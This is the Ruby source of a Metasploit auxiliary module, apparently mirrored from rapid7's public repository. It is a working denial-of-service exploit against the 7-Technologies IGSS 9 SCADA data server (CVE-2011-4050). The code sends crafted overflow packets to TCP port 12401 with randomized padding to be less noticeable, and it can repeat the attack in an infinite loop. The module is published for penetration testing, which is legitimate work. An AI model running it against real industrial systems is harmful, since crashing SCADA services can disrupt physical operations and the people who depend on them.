Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/scada/igss9_dataserver.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => '7-Technologies IGSS 9 IGSSdataServer.exe DoS',

15
        'Description' => %q{

16
          The 7-Technologies SCADA IGSS Data Server (IGSSdataServer.exe) <= 9.0.0.10306 can be

17
          brought down by sending a crafted TCP packet to port 12401.  This should also work

18
          for version <= 9.0.0.1120, but that version hasn't been tested.

19
        },

20
        'Author' => [

21
          'jfa', # Metasploit module

22
        ],

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          [ 'CVE', '2011-4050' ],

26
          [ 'OSVDB', '77976' ],

27
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-335-01' ]

28
        ],

29
        'DisclosureDate' => '2011-12-20',

30
        'Notes' => {

31
          'Stability' => [CRASH_SERVICE_DOWN],

32
          'SideEffects' => [],

33
          'Reliability' => []

34
        }

35
      )

36
    )

37


38
    register_options(

39
      [

40
        Opt::RPORT(12401),

41
        OptInt.new('COUNT', [ true, 'DoS IGSSdataServer.exe this many times. 0 for infinite loop.', 1]),

42
        OptInt.new('SLEEP', [ true, 'Number of seconds to sleep between sending DoS packet.', 3])

43
      ]

44
    )

45
  end

46


47
  def run

48
    #

49
    # dos = "\x00\x04\x01\x00\x34\x12\x0D\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"

50
    # dos << Rex::Text.rand_text_alpha(5014)

51
    #

52
    # I should have looked at the other MSF modules before I started doing it the hard way.

53
    # Lesson learn, thanks hal. Mostly borrowed from igss9_igssdataserver_rename

54
    #

55


56
    count = datastore['COUNT']

57
    snore = datastore['SLEEP']

58
    times = 1

59


60
    # Someone wants to keep a good service down.

61
    if count == 0

62
      count = 1

63
      infinite = true

64
    end

65


66
    #

67
    # The port seems to stay open open until someone clicks "Close the program".

68
    # Once they click "Close the program" (Windows 7), the port becomes unavailable.

69
    #

70
    # However, even though it's open, it doesn't seem to handle any valid requests.

71
    #

72
    while count >= 1

73
      ## Randomize the buffer size to make it a teeny tiny bit less obvious

74
      size = Random.new.rand(1024..5014)

75


76
      dos = "\x00\x04" # Funky size causes overflow

77
      dos << "\x01\x00\x34\x12"

78
      dos << "\x0D"               # Opcode

79
      dos << "\x00\x00\x00\x00\x00\x00\x00"

80
      dos << "\x01"               # Flag

81
      dos << "\x00\x00\x00\x01\x00\x00\x00"

82
      dos << Rex::Text.rand_text_alpha(size)

83


84
      begin

85
        connect

86
        sock.put(dos)

87
        print_status("Sending DoS packet #{times}, size: #{dos.length} ...")

88
        disconnect

89
      rescue ::Rex::ConnectionError, Errno::ECONNREFUSED

90
        print_status("Connection refused. Someone may have clicked 'Close the program'")

91
      end

92


93
      if infinite

94
        select(nil, nil, nil, snore)

95
      else

96
        select(nil, nil, nil, snore) if count > 1

97
        count -= 1

98
      end

99
      times += 1

100


101
    end

102
  end

103
end

104


105